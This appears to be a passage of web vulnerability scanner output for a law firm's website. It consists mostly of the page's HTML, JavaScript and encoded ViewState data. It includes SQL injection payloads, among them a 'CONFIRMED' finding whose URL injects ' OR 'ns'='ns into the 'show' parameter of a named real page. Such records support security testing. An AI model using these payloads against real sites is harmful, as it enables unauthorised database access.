d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">
P,TD,DIV,SPAN {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
FONT {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
body {
<!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;-->
scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff;
}
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="Margin-left:0;Margin-top:10;margin-bottom:0">
<form name="Form1" method="post" action="showlocationnew.aspx?PrintPage=True&amp;Show=-1+OR+17-7%3d10&amp;sortby=3&amp;by=3&amp;title=3&amp;related=3" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM+Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA+O2k8MT47PjtsPHQ8O2w8aTwzPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciBcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQyNiIgYmlvc25ldy5hc3B4P1NlYXJjaD0nVHJ1ZSZhbXBcO0xvY2F0aW9uPTI1MzAiJyB3d3cyIHd3dy5tY2NhcnRlci5jb20gaHR0cDpcPk5FV0FSSyZuYnNwXDtPZmZpY2UgTGF3eWVyc1w8L2FcPlw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8Zm9vIGZhY2U9QXJpYWwsSGVsdmV0aWNhIHNpemU9Mlw+XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gdGhlIE5FV0FSSyBPZmZpY2U6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPlw8c3Ryb25nXD5Gcm9tIHBvaW50cyBpbiBOZXcgSmVyc2V5Olw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8c3Ryb25nXD5HYXJkZW4gU3RhdGUgUGFya3dheTogXDwvc3Ryb25nXD5UYWtlIFw8Zm9vIHNpemU9Mlw+R2FyZGVuIFN0YXRlIFBhcmt3YXkgdG8gRXhpdCAxNDUuIEZvbGxvdyBzaWducyZuYnNwXDtvbnRvJm5ic3BcO1J0IDI4MCBFYXN0LiBXaGVuIDI4MCBmb3JrcyAtIHN0YXkgcmlnaHQsIGZvbGxvd2luZyBzaWducyBmb3IgSGFycmlzb24uIEV4aXQgYXQgMTUgKFJ0LiAyMSBTb3V0aC1Eb3dudG93bikuIFByb2NlZWQgdG8gdGhlIGJvdHRvbSBvZiB0aGUgcmFtcC4gVHVybiByaWdodCBvbnRvIFJ0LiAyMSAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIHByb2NlZWQgMSBtaWxlIHRvIHRoZSBpbnRlcnNlY3Rpb24gTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0LiZuYnNwXDsgVHVybiByaWdodCBhdCB0aGUgaW50ZXJzZWN0aW9uIG9udG8gKE1hcmtldCBTdHJlZXQpJm5ic3BcOyBQcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyZuYnNwXDtyaWdodCBhdCB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuIChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCZuYnNwXDtiZWZvcmUgdGhlIG5leHQgdHJhZmZpYyBsaWdodCkuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2smbmJzcFw7eW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycmbmJzcFw7cGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCZuYnNwXDt0byB0aGUmbmJzcFw7MTV0aCBmbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPHN0cm9uZ1w+Um91dGUgNzgvMjQgRWFzdDpcPC9zdHJvbmdcPiBcPGZvbyBzaXplPTJcPkZvbGxvdyBzaWducyBmb3IgTmV3YXJrIEFpcnBvcnQsIEV4aXQgNTcuIEZvbGxvdyBzaWducyBmb3IgZm9yIFJvdXRlIDIxIOKAkyBOZXdhcmssJm5ic3BcO292ZXIgYnJpZGdlIG9udG8gUm91dGUgMjEgTm9ydGggd2hpY2ggYmVjb21lcyBNY0NhcnRlciBIaWdod2F5LiBQcm9jZWVkIGFwcHJveGltYXRlbHkgMSYjMTg5XDsgbWlsZXMgdG8gdGhlIGludGVyc2VjdGlvbiBvZiBNY0NhcnRlciBIaWdod2F5LyBFZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBvbnRvIChFZGlzb24gUGxhY2UpIGFuZCBwcm9jZWVkIHRvJm5ic3BcO3RoZSBuZXh0IHRyYWZmaWMgbGlnaHQgd2hpY2ggaXMmbmJzcFw7KE11bGJlcnJ5IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvIE11bGJlcnJ5IFN0cmVldCBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBpbnRlcnNlY3Rpb24gd2hpY2ggaXMoIE11bGJlcnJ5IFN0cmVldC9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IHR1cm4mbmJzcFw7b250byAoTWFya2V0KSZuYnNwXDthbmQgYmVhciBkaWFnb25hbGx5IGFjcm9zcyZuYnNwXDt0b3dhcmRzIHlvdXIgbGVmdCZuYnNwXDt0byBnZXQgaW50byB0aGUgbGVmdCBoYW5kIHR1cm4gbGFuZS4mbmJzcFw7IE1ha2UgYSBsZWZ0IHR1cm4mbmJzcFw7aW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPlJvdXRlIDMgb3IgUm91dGUgMjE6IFw8L3N0cm9uZ1w+XDwvZm9vXD5cPGZvbyBzaXplPTJcPkZyb20gUnQuIDMsIHRha2UgUm91dGUgMjEgU291dGggYWJvdXQgNCBtaWxlcyBhbmQgdGhlbiBSb3V0ZSAyMSBiZWNvbWVzIGEgNC1sYW5lIG5vbi1kaXZpZGVkIGhpZ2h3YXkuIEZyb20gdGhpcyBwb2ludCwgcHJvY2VlZCAxJiMxODlcOyBtaWxlcyB0byB0aGUgaW50ZXJzZWN0aW9uIG9mIE1jQ2FydGVyIEhpZ2h3YXkvTWFya2V0IFN0cmVldC4gVHVybiByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkmbmJzcFw7IFByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIG1vdXRoIG9mIHRoZSByZWFyIGRyaXZld2F5IGVudHJhbmNlLiZuYnNwXDsoVGhlIGVudHJhbmNlIHRvIHRoZSZuYnNwXDtkcml2ZXdheSZuYnNwXDtpcyBsb2NhdGVkIGp1c3QmbmJzcFw7YmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDtBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPGJyXD5cPGJyXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPkZyb20gUGVubnN5bHZhbmlhIG9yIFdlc3Rlcm4gTkogdmlhIFJ0LiA4MCBFYXN0Olw8L3N0cm9uZ1w+XDwvZm9vXD5cPC9wXD4NClw8cFw+XDxmb28gc2l6ZT0yXD5Sb3V0ZSA4MCBFYXN0IG9udG8gUm91dGUgMjgwIEVhc3QuIFByb2NlZWQgYXBwcm94aW1hdGVseSAxNCBtaWxlcyB1bnRpbCBSb3V0ZSAyODAgZm9ya3MuIEZvbGxvdyBzaWducyB0YWtpbmcgSS0yODAgRWFzdC4gV2hlbiBSb3V0ZSAyODAgZm9ya3MgLS0gc3RheSByaWdodCwgZm9sbG93aW5nIHNpZ25zIGZvciBIYXJyaXNvbi4gRXhpdCBhdCAxNSAoUnQuIDIxIFNvdXRoLURvd250b3duKS4gUHJvY2VlZCB0byB0aGUgYm90dG9tIG9mIHRoZSByYW1wLiBUdXJuIHJpZ2h0IG9udG8gUnQuIDIxIChNY0NhcnRlciBIaWdod2F5KSBhbmQgcHJvY2VlZCAxIG1pbGUgdG8gdGhlJm5ic3BcO2ludGVyc2VjdGlvbiBvZiggTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IGF0IHRoZSBsaWdodCBvbnRvIChNYXJrZXQgU3RyZWV0KSZuYnNwXDsgUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDE1MCBmZWV0IHR1cm5pbmcgcmlnaHQgaW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuXDwvZm9vXD5cPC9wXD4NClw8cFw+XDxzdHJvbmdcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5Gcm9tIFBlbm5zeWx2YW5pYSBvciBXZXN0ZXJuIE5KIHZpYSBSdC4mbmJzcFw7NzggRWFzdDpcPC9mb29cPiBcPC9zdHJvbmdcPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIHNpemU9Mlw+XDxmb28gc2l6ZT0yXD5cPGZvbyBzaXplPTJcPlJ0XDwvZm9vXD5cPC9zbWFsbFw+LiA3OCBFYXN0LiBGb2xsb3cgc2lnbnMgZm9yIE5ld2FyayBBaXJwb3J0LCBFeGl0IDU3LiBGb2xsb3cgc2lnbnMgZm9yIGZvciBSb3V0ZSAyMSDigJMgTmV3YXJrLCZuYnNwXDtvdmVyIGJyaWRnZSBvbnRvIFJvdXRlIDIxIE5vcnRoIHdoaWNoIGJlY29tZXMgTWNDYXJ0ZXIgSGlnaHdheS4gUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDEmIzE4OVw7IG1pbGVzIHRvIHRoZSBpbnRlcnNlY3Rpb24gb2YgTWNDYXJ0ZXIgSGlnaHdheS9FZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBhdCB0aGUgbGlnaHQgb250byAoRWRpc29uIFBsYWNlKSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCZuYnNwXDt0cmFmZmljIGxpZ2h0IHdoaWNoIGlzIChNdWxiZXJyeSBTdHJlZXQpJm5ic3BcOyBNYWtlIGEgcmlnaHQgb250byAoTXVsYmVycnkgU3RyZWV0KSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBsaWdodCB3aGljaCBpcyAoTWFya2V0IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvJm5ic3BcOyhNYXJrZXQgU3RyZWV0KSBhbmQmbmJzcFw7YmVhciBkaWFnb25hbGx5IGFjcm9zcyB0b3dhcmRzIHlvdXIgbGVmdCB0byBnZXQgaW50byB5b3VyIGxlZnQgaGFuZCB0dXJuIGxhbmUuJm5ic3BcOyBNYWtlIGEgbGVmdCBpbnRvIHRoZSZuYnNwXDttb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IEEgc2VjdXJpdHkgb2ZmaWNlciB3aWxsIG1lZXQgeW91IGF0IHlvdXIgdmVoaWNsZSB0byZuYnNwXDtjaGVjayB5b3VyIHNlY3VyaXR5IGNyZWRlbnRpYWxzLiZuYnNwXDsgUGxlYXNlIHBhcmsgeW91ciB2ZWhpY2xlIGluIHRoZSBvdXRkb29yIHZpc2l0b3JzJyBwYXJraW5nIGxvdC4mbmJzcFw7IFBsZWFzZSBwcm9jZWVkIHRvIHRoZSAxNXRoIEZsb29yIFJlY2VwdGlvbiBEZXNrLCBHYXRld2F5IElWLiZuYnNwXDtcPC9mb29cPlw8L3NtYWxsXD5cPC9mb29cPlw8L3BcPlw8Zm9vIHNpemU9Mlw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gY29sb3I9IzAwMDA4MCBzaXplPTRcPlw8c3Ryb25nXD5Gcm9tIE5ldyBZb3JrIENpdHk6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBIb2xsYW5kIFR1bm5lbDogXDwvc3Ryb25nXD5UYWtlIHRoZSBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+SG9sbGFuZCBUdW5uZWwgdG8gTmV3IEplcnNleSBUdXJucGlrZSBOb3J0aCB0byBFeGl0IDE1VyAtIG9udG8gUm91dGUgMjgwIFdlc3QuIENvbnRpbnVlIGFwcHJveGltYXRlbHkgMiYjMTg5XDsgbWlsZXMgdG8gZXhpdCAxNSAtIFJvdXRlIDIxIFNvdXRoLU5ld2Fyay4gUHJvY2VlZGluZyBkb3duIGV4aXQgcmFtcCBzdGF5IHRvIHlvdXIgbGVmdCBmb2xsb3dpbmcgc2lnbnMgZm9yIFJ0LiAyMSBTb3V0aCBhbmQgdGhlIE4uIEouIFBlcmZvcm1pbmcgQXJ0cyBDZW50ZXIgKHNoYXJwIGN1cnZlIHRvIHRoZSBsZWZ0KSB0byBib3R0b20gb2YgcmFtcC4gVHVybiByaWdodCAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIGNvbnRpbnVlIGFwcHJveGltYXRlbHkgMSBtaWxlIHRvIGludGVyc2VjdGlvbiBvZiZuYnNwXDsoTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsmbmJzcFw7IE1ha2UgYSByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkgYW5kIHByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuJm5ic3BcO1w8L2Zvb1w+XDwvcFw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBMaW5jb2xuIFR1bm5lbDpcPC9zdHJvbmdcPiBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+Rm9sbG93IHNpZ25zIGZvciBOSiBUdXJucGlrZSBTb3V0aCB0byBFeGl0IDE1Vy1Sb3V0ZSAyODAgV2VzdC4gQ29udGludWUgYXBwcm94aW1hdGVseSAyJiMxODlcOyBtaWxlcyB0byBleGl0IDE1IC0gUm91dGUgMjEgU291dGgtTmV3YXJrLiBQcm9jZWVkaW5nIGRvd24gZXhpdCByYW1wIHN0YXkgdG8geW91ciBsZWZ0IGZvbGxvd2luZyBzaWducyBmb3IgUnQuIDIxIFNvdXRoIGFuZCB0aGUgTi4gSi4gUGVyZm9ybWluZyBBcnRzIENlbnRlciAoc2hhcnAgY3VydmUgdG8gdGhlIGxlZnQpIHRvIGJvdHRvbSBvZiByYW1wLiBUdXJuIHJpZ2h0IChNY0NhcnRlciBIaWdod2F5KSBhbmQgY29udGludWUgYXBwcm94aW1hdGVseSAxIG1pbGUgdG8gaW50ZXJzZWN0aW9uIG9mIChNY0NhcnRlciBIaWdod2F5L01hcmtldCBTdHJlZXQpLiZuYnNwXDsgTWFrZSBhIHJpZ2h0IG9udG8gKE1hcmtldCBTdHJlZXQpIGFuZCBwcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyByaWdodCBpbnRvIHRoZSBtb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGx..
- /new/showbionew.aspx

/new/showbionew.aspx CONFIRMED

http://www.mccarter.com/new/showbionew.aspx?show='+OR+'ns'%3d'ns&Related=3

Parameters

Parameter Type Value
show GET ' OR 'ns'='ns
Related GET 3
__VIEWSTATE POST dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY O2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPEJ1cnRvbiBXaW5uaWNrOz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iQnVydG9uLFdpbm5pY2ssQnVydG9uIFdpbm5pY2ssQ29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zLFJlYWwgRXN0YXRlLFJlZGV2ZWxvcG1lbiIgXD4gOz4 Ozs O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJERVNDUklQVElPTiIgQ09OVEVOVD0iDQogTXIuIFdpbm5pY2sgaXMgb2ZmaWNlIG1hbmFnaW5nIHBhcnRuZXIgb2YgdGhlIGZpcm0ncyBCb3N0b24gT2ZmaWNlIGFuZCBhIHJlYWwgZXN0YXRlIHBhcnRuZXIgaW4gdGhlIGZpcm0ncyBSZWFsIEVzdGF0ZS8gQ29uc3RydWN0aW9uLyBFbnZpcm9ubWVudGFsIFByYWN0aWNlIEdyb3VwLiBIZSZuYnNwXDtyZXByZXNlbnRzIGxlbmRlcnMgaW4gbmVnb3RpYXRpbmcgYW5kIGRvY3VtZW50aW5nIHNlY3VyZWQgbG9hbiB0cmFuc2FjdGlvbnMiXD47Pj47Oz47dDw7bDxpPDA Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw Oz4 Ozs Oz4 O3Q8O2w8aTwxMz47PjtsPHQ8O2w8aTwxPjtpPDc O2k8OT47aTwxMT47aTwxMz47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c3BhbiBzdHlsZT0iY29sb3I6IzAwMDAwMCJcPlw8Qlw UFJBQ1RJQ0VTXDwvQlw XDxCUlw XDwvc3Bhblw IFw8YSB0YXJnZXQ9Il90b3AiIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OCJcPlJlYWwgRXN0YXRlXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1Ilw Q29ycG9yYXRlLCBTZWN1cml0aWVzIGFuZCBGaW5hbmNpYWwgSW5zdGl0dXRpb25zXDwvYVw LCBcPGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3Ilw UmVkZXZlbG9wbWVudFw8L2FcPlw8QlJcPjs Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGRpdlw DQpcPHBcPk1yLiBXaW5uaWNrIGlzIG9mZmljZSBtYW5hZ2luZyBwYXJ0bmVyIG9mIHRoZSBmaXJtJ3MgQm9zdG9uIE9mZmljZSBhbmQgYSByZWFsIGVzdGF0ZSBwYXJ0bmVyIGluIHRoZSBmaXJtJ3MgUmVhbCBFc3RhdGUvIENvbnN0cnVjdGlvbi8gRW52aXJvbm1lbnRhbCBQcmFjdGljZSBHcm91cC4gSGUmbmJzcFw7cmVwcmVzZW50cyBsZW5kZXJzIGluIG5lZ290aWF0aW5nIGFuZCBkb2N1bWVudGluZyBzZWN1cmVkIGxvYW4gdHJhbnNhY3Rpb25zIGluY2x1ZGluZyByZWFsIGVzdGF0ZSBsb2FucywgY29uc3RydWN0aW9uIGxvYW5zLCBwcml2YXRlIGJhbmtpbmcgYW5kIGFzc2V0LWJhc2VkIGxvYW5zLCBsZXR0ZXJzIG9mIGNyZWRpdCwmbmJzcFw7YW5kIHBhcnRpY2lwYXRpb24gYW5kIGFnZW5jeSBhZ3JlZW1lbnRzLlw8c3Bhblw 